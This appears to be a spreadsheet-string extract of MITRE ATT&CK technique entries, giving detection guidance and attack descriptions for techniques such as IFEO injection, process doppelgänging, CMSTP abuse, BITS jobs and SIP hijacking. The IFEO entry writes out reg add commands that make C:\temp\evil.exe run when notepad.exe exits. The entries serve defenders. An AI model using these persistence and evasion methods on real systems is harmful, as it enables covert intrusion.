    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.
Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>
    <t>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 (Citation: Microsoft Security Subsystem)
Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015)  (Citation: Microsoft DsAddSidHistory)
Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools  (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors  (Citation: GMER Rootkits) can also be used to monitor for various flavors of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes  (Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</t>
  </si>
  <si>
    <t>persistence,privilege-escalation,credential-access</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data). (Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of extra window memory (EWM) to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may take place in the address space of a separate live process. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread. (Citation: Endgame Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>AppCert DLLs</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)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t>
  </si>
  <si>
    <t>Image File Execution Options Injection</t>
  </si>
  <si>
    <t>Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Endgame Process Injection July 2017)</t>
  </si>
  <si>
    <t>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g  notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as &lt;code&gt;Debugger&lt;/code&gt; values in the Registry under &lt;code&gt;HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt;&lt;/code&gt; where &lt;code&gt;&lt;executable&gt;&lt;/code&gt; is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\&lt;/code&gt;. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1&lt;/code&gt;
* &lt;code&gt;reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"&lt;/code&gt;
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</t>
  </si>
  <si>
    <t>privilege-escalation,persistence,defense-evasion</t>
  </si>
  <si>
    <t>SSH Hijacking</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</t>
  </si>
  <si>
    <t>Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)
[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Man in the Browser</t>
  </si>
  <si>
    <t>Authentication logs,Packet capture,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>This is a difficult technique to detect because adversary traffic would be masked by normal user traffic. No new processes are created and no additional software touches disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for process injection against browser applications</t>
  </si>
  <si>
    <t>Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques. (Citation: Wikipedia Man in the Browser)
A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet. (Citation: Cobalt Strike Browser Pivot) (Citation: ICEBRG Chrome Extensions)
Browser pivoting requires the SeDebugPrivilege and a high-integrity process to execute. Browser traffic is pivoted from the adversary's browser through the user's browser by setting up an HTTP proxy which will redirect any HTTP and HTTPS traffic. This does not alter the user's traffic in any way. The proxy connection is severed as soon as the browser is closed. Whichever browser process the proxy is injected into, the adversary assumes the security context of that process. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could browse to any resource on an intranet that is accessible through the browser and which the browser has sufficient permissions, such as Sharepoint or webmail. Browser pivoting also eliminates the security provided by 2-factor authentication. (Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF)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 (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)
Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may leverage TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055) called Process Doppelgänging. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging's use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)
Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load – Create a shared section of memory and load the malicious executable.
* Rollback – Undo changes to original executable, effectively removing malicious code from the file system.
* Animate – Create a process from the tainted section of memory and initiate execution.</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>File monitoring,Network protocol analysis,Network device logs,Process use of network</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.</t>
  </si>
  <si>
    <t>To disguise the source of malicious traffic, adversaries may chain together multiple proxies.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t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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initial-access</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>CMSTP</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</t>
  </si>
  <si>
    <t>Windows,macOS,Linux</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because this technique usually involves user interaction on the endpoint, many of the possible detections for Spearphishing Link take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Anti-virus,Web proxy</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).</t>
  </si>
  <si>
    <t>Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Web proxy,File monitoring</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Control Panel Items</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Windows Registry,Windows event logs,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1085) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1085) command, which may bypass detections and/or execution filters for control.exe. (Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;Cpls&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;). (Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item. (Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques. (Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>API monitoring,Packet capture,Windows event logs</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;). (Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)  (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS)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
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</t>
  </si>
  <si>
    <t>SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>API monitoring,Application logs,DLL monitoring,Loaded DLLs,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>In user mode, Windows Authenticode (Citation: Microsoft Authenticode)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  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
